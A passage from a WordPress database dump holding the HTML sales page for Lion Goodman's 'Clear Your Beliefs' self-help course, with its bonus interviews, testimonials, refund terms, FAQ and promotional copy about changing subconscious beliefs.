eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 15:59:17', '2014-06-17 20:59:17', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(931, 4194, '2014-06-17 16:07:23', '2014-06-17 21:07:23', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before 